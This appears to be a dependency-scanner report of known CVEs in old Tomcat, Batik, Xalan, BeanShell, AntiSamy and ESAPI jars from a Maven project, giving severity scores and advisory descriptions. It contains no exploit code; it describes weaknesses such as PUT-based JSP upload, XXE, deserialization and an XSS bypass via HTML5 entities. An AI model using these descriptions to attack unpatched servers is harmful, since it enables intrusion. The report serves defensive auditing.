The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.

Vulnerable Software & Versions: (show all)

CVE-2016-0763  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.

Vulnerable Software & Versions: (show all)

CVE-2016-3092  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

Vulnerable Software & Versions: (show all)

CVE-2016-5018  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications.

Vulnerable Software & Versions: (show all)

CVE-2016-5388  

Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.

Vulnerable Software & Versions: (show all)

CVE-2016-5425  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6325  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6794  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.

Vulnerable Software & Versions: (show all)

CVE-2016-6796  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet.

Vulnerable Software & Versions: (show all)

CVE-2016-6797  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.

Vulnerable Software & Versions: (show all)

CVE-2016-6816  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.

Vulnerable Software & Versions: (show all)

CVE-2016-8735  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

Vulnerable Software & Versions: (show all)

CVE-2016-8745  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-388

A bug in the error handling of the send file code for the NIO HTTP connector in Apache Tomcat 9.0.0.M1 to 9.0.0.M13, 8.5.0 to 8.5.8, 8.0.0.RC1 to 8.0.39, 7.0.0 to 7.0.73 and 6.0.16 to 6.0.48 resulted in the current Processor object being added to the Processor cache multiple times. This in turn meant that the same Processor could be used for concurrent requests. Sharing a Processor can result in information leakage between requests including, not not limited to, session ID and the response body. The bug was first noticed in 8.5.x onwards where it appears the refactoring of the Connector code for 8.5.x onwards made it more likely that the bug was observed. Initially it was thought that the 8.5.x refactoring introduced the bug but further investigation has shown that the bug is present in all currently supported Tomcat versions.

Vulnerable Software & Versions: (show all)

CVE-2017-12615  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions: (show all)

CVE-2017-12616  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.

Vulnerable Software & Versions: (show all)

CVE-2017-12617  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions: (show all)

CVE-2017-5647  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.

Vulnerable Software & Versions: (show all)

CVE-2017-5648  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
CWE: CWE-284 Improper Access Control

While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.

Vulnerable Software & Versions: (show all)

CVE-2017-5664  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.

Vulnerable Software & Versions: (show all)

CVE-2017-6056  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-19 Data Processing Errors

It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu.

Vulnerable Software & Versions:

CVE-2017-7674  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-345 Insufficient Verification of Data Authenticity

The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.

Vulnerable Software & Versions: (show all)

CVE-2018-1304  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-254 7PK - Security Features

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

Vulnerable Software & Versions: (show all)

CVE-2018-1305  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

Vulnerable Software & Versions: (show all)

CVE-2018-1336  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')

An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.

Vulnerable Software & Versions: (show all)

CVE-2018-8014  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-254 7PK - Security Features

The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.

Vulnerable Software & Versions: (show all)

CVE-2018-8034  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-295 Improper Certificate Validation

The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.

Vulnerable Software & Versions: (show all)

commons-beanutils-core-1.7.0.jar

File Path: /Users/Kevin/.m2/repository/commons-beanutils/commons-beanutils-core/1.7.0/commons-beanutils-core-1.7.0.jar
MD5: 458b500e7283d295f69a93ffc4a15293
SHA1: 52f7701e1e9fd1d2b93379503c0bc839d2caf68d
SHA256:dbdac3b81a1c22a1d09b8c4a1c55b00af4767bd068838651c04c2f130172a207
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:commons_beanutils:1.7.0  Confidence:Low  
  • maven: commons-beanutils:commons-beanutils-core:1.7.0  Confidence:Highest

CVE-2014-0114  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions: (show all)

xmlParserAPIs-2.6.2.jar

File Path: /Users/Kevin/.m2/repository/xerces/xmlParserAPIs/2.6.2/xmlParserAPIs-2.6.2.jar
MD5: 2651f9f7c39e3524f3e2c394625ac63a
SHA1: 065acede1e5305bd2b92213d7b5761328c6f4fd9
SHA256:1c2867be1faa73c67e9232631241eb1df4cd0763048646e7bb575a9980e9d7e5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xerces:xmlParserAPIs:2.6.2  Confidence:Highest

xercesImpl-2.6.2.jar

File Path: /Users/Kevin/.m2/repository/xerces/xercesImpl/2.6.2/xercesImpl-2.6.2.jar
MD5: c4c5a77f9e61f33d80780176451d71c2
SHA1: 897bcb56d6b7fe2070a5f561bfc78968ecdd3851
SHA256:7512957342dc34290f27c0d5fd4313e00acb1e6dbe2992fd4ca66b46d7200035
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xerces:xercesImpl:2.6.2  Confidence:Highest

xalan-2.7.0.jar

File Path: /Users/Kevin/.m2/repository/xalan/xalan/2.7.0/xalan-2.7.0.jar
MD5: a018d032c21a873225e702b36b171a10
SHA1: a33c0097f1c70b20fa7ded220ea317eb3500515e
SHA256:bf1f065efd6e3d5cb964db4130815752015873338999d23dcafc2dbc89fc7d9b
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2014-0107  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The TransformerFactory in Apache Xalan-Java before 2.7.2 does not properly restrict access to certain properties when FEATURE_SECURE_PROCESSING is enabled, which allows remote attackers to bypass expected restrictions and load arbitrary classes or access external resources via a crafted (1) xalan:content-header, (2) xalan:entities, (3) xslt:content-header, or (4) xslt:entities property, or a Java property that is bound to the XSLT 1.0 system-property function.

Vulnerable Software & Versions: (show all)

xom-1.1.jar

File Path: /Users/Kevin/.m2/repository/xom/xom/1.1/xom-1.1.jar
MD5: 6b5e76db86d7ae32a451ffdb6fce0764
SHA1: 6705564269d976dbc0d869b58aca25290c0eb4cb
SHA256:05d513cce3f19c1bc4b06c545431da10dbd2f96b4e83aa715d2fe92b06d951a7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xom:xom:1.1  Confidence:Highest

bsh-core-2.0b4.jar

Description:

 BeanShell core

File Path: /Users/Kevin/.m2/repository/org/beanshell/bsh-core/2.0b4/bsh-core-2.0b4.jar
MD5: bab431f0908fde87034f0c34c6cf1e30
SHA1: 495e25a99e29970ffe8ba0b1d551e1d1a9991fc1
SHA256:d7cfeb28b2af7b53ef570dd742b8731ed7f71a938e6e9a73384940f4c818d069
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.beanshell:bsh-core:2.0b4  Confidence:Highest
  • cpe: cpe:/a:beanshell_project:beanshell:2.0.b4  Confidence:Low  

CVE-2016-2510  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

BeanShell (bsh) before 2.0b6, when included on the classpath by an application that uses Java serialization or XStream, allows remote attackers to execute arbitrary code via crafted serialized data, related to XThis.Handler.

Vulnerable Software & Versions:

batik-ext-1.7.jar

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/xmlgraphics/batik-ext/1.7/batik-ext-1.7.jar
MD5: 080f3a49c658693dfbb4e48b0bfc8f07
SHA1: 4784302b44a0336166fef6153a5e3d73e861aecc
SHA256:de85a6de7cdd36ee9ff28dfe7e03d515be92a702d61028f8928c0cd56f1ee375
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:batik:1.7  Confidence:Highest  
  • maven: org.apache.xmlgraphics:batik-ext:1.7  Confidence:Highest

CVE-2015-0250  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file.

Vulnerable Software & Versions: (show all)

CVE-2017-5662  

Severity:High
CVSS Score: 7.9 (AV:N/AC:M/Au:S/C:C/I:N/A:C)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

In Apache Batik before 1.9, files lying on the filesystem of the server which uses batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service as the references within a xml document can trivially trigger an amplification attack.

Vulnerable Software & Versions:

CVE-2018-8013  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Batik 1.x before 1.10, when deserializing subclass of `AbstractDocument`, the class takes a string from the inputStream as the class name which then use it to call the no-arg constructor of the class. Fix was to check the class type before calling newInstance in deserialization.

Vulnerable Software & Versions: (show all)

xml-apis-ext-1.3.04.jar

Description:

 xml-commons provides an Apache-hosted set of DOM, SAX, and 
    JAXP interfaces for use in other xml-based projects. Our hope is that we 
    can standardize on both a common version and packaging scheme for these 
    critical XML standards interfaces to make the lives of both our developers 
    and users easier. The External Components portion of xml-commons contains 
    interfaces that are defined by external standards organizations. For DOM, 
    that's the W3C; for SAX it's David Megginson and sax.sourceforge.net; for 
    JAXP it's Sun.

File Path: /Users/Kevin/.m2/repository/xml-apis/xml-apis-ext/1.3.04/xml-apis-ext-1.3.04.jar
MD5: bcb07d3b8d2397db7a3013b6465d347b
SHA1: 41a8b86b358e87f3f13cf46069721719105aff66
SHA256:d0b4887dc34d57de49074a58affad439a013d0baffa1a8034f8ef2a5ea191646
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xml-apis:xml-apis-ext:1.3.04  Confidence:Highest

nekohtml-1.9.12.jar

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/sourceforge/nekohtml/nekohtml/1.9.12/nekohtml-1.9.12.jar
MD5: 0e5bd4ce84fab674dbc0c95c4bd193d0
SHA1: 6b58cfa01218d900a5c5996b82b52cffab981c0a
SHA256:7580bbf927c939ffb81139ec42fec395f7228c1d81ca8757261e119e7876cc80
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.sourceforge.nekohtml:nekohtml:1.9.12  Confidence:Highest

commons-httpclient-3.1.jar

Description:

 The HttpClient  component supports the client-side of RFC 1945 (HTTP/1.0)  and RFC 2616 (HTTP/1.1) , several related specifications (RFC 2109 (Cookies) , RFC 2617 (HTTP Authentication) , etc.), and provides a framework by which new request types (methods) or HTTP extensions can be created easily.

License:

Apache License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/commons-httpclient/commons-httpclient/3.1/commons-httpclient-3.1.jar
MD5: 8ad8c9229ef2d59ab9f59f7050e846a5
SHA1: 964cd74171f427720480efdec40a7c7f6e58426a
SHA256:dbd4953d013e10e7c1cc3701a3e6ccd8c950c892f08d804fabfac21705930443
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:httpclient:3.1  Confidence:Low  
  • cpe: cpe:/a:apache:commons-httpclient:3.1  Confidence:Low  
  • maven: commons-httpclient:commons-httpclient:3.1  Confidence:Highest

antisamy-1.4.3.jar

File Path: /Users/Kevin/.m2/repository/org/owasp/antisamy/antisamy/1.4.3/antisamy-1.4.3.jar
MD5: 9c7777853e159535f4d510b4dc0a88a9
SHA1: 6bac1ebc43ac3db223f592ce904ac4c2f3ef26e5
SHA256:a1e7e3cf60798f4b6024d68dec65baa52ec7ad09cff136c4d675a54c408db618
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2016-10006  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

In OWASP AntiSamy before 1.5.5, by submitting a specially crafted input (a tag that supports style with active content), you could bypass the library protections and supply executable code. The impact is XSS.

Vulnerable Software & Versions:

CVE-2017-14735  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

OWASP AntiSamy before 1.5.7 allows XSS via HTML5 entities, as demonstrated by use of &colon; to construct a javascript: URL.

Vulnerable Software & Versions: (show all)

CVE-2018-1000643  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

OWASP OWASP ANTISAMY version 1.5.7 and earlier contains a Cross Site Scripting (XSS) vulnerability in AntiSamy.scan() - for both SAX & DOM that can result in Cross Site Scripting.

Vulnerable Software & Versions:

esapi-2.0.1.jar

Description:

 The Enterprise Security API (ESAPI) project is an OWASP project
        to create simple strong security controls for every web platform.
        Security controls are not simple to build. You can read about the
        hundreds of pitfalls for unwary developers on the OWASP website. By
        providing developers with a set of strong controls, we aim to
        eliminate some of the complexity of creating secure web applications.
        This can result in significant cost savings across the SDLC.
    

License:

BSD: http://www.opensource.org/licenses/bsd-license.php
Creative Commons 3.0 BY-SA: http://creativecommons.org/licenses/by-sa/3.0/
File Path: /Users/Kevin/.m2/repository/org/owasp/esapi/esapi/2.0.1/esapi-2.0.1.jar
MD5: 90c61b27a98c1e0940381b47efe93852
SHA1: 2ea3b87c948dbc0c77a17fe24fda961ecc38c6f2
SHA256:337ce7afc69ebed3851ba512060615e77ad488252cab210803b1e129da506302
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2013-5679  

Severity:Low
CVSS Score: 2.6 (AV:L/AC:H/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The authenticated-encryption feature in the symmetric-encryption implementation in the OWASP Enterprise Security API (ESAPI) for Java 2.x before 2.1.0 does not properly resist tampering with serialized ciphertext, which makes it easier for remote attackers to bypass intended cryptographic protection mechanisms via an attack against authenticity in the default configuration, involving a null MAC and a zero MAC length.

Vulnerable Software & Versions: (show all)

CVE-2013-5960  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The authenticated-encryption feature in the symmetric-encryption implementation in the OWASP Enterprise Security API (ESAPI) for Java 2.x before 2.1.0.1 does not properly resist tampering with serialized ciphertext, which makes it easier for remote attackers to bypass intended cryptographic protection mechanisms via an attack against the intended cipher mode in a non-default configuration, a different vulnerability than CVE-2013-5679.

Vulnerable Software & Versions: (show all)

tomcat-coyote-7.0.0.jar

Description:

 Tomcat Connectors and HTTP parser

File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-coyote/7.0.0/tomcat-coyote-7.0.0.jar
MD5: cd8fcb87a3eb0bd7dec0d1b26722e9e9
SHA1: fb07ea462132c8df498254b1ee4af0c2795251fb
SHA256:6aa5878498e9da136dd3f8b83a1887b9926f886cbc7ef9237526bf80a23f27da
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:coyote_http_connector:7.0.0  Confidence:Low  
  • cpe: cpe:/a:apache:tomcat_connectors:7.0.0  Confidence:Low  
  • maven: org.apache.tomcat:tomcat-coyote:7.0.0  Confidence:Highest
  • cpe: cpe:/a:apache_software_foundation:tomcat:7.0.0  Confidence:Low  
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:7.0.0  Confidence:Low  
  • cpe: cpe:/a:apache:tomcat:7.0.0  Confidence:Highest  

CVE-2010-2227  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."

Vulnerable Software & Versions: (show all)

CVE-2010-3718  

Severity:Low
CVSS Score: 1.2 (AV:L/AC:H/Au:N/C:N/I:P/A:N)

Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

Vulnerable Software & Versions: (show all)

CVE-2010-4172  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.

Vulnerable Software & Versions: (show all)

CVE-2011-0013  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.

Vulnerable Software & Versions: (show all)

CVE-2011-0534  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.

Vulnerable Software & Versions: (show all)

CVE-2011-1088  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)

Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.

Vulnerable Software & Versions: (show all)

CVE-2011-1184  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

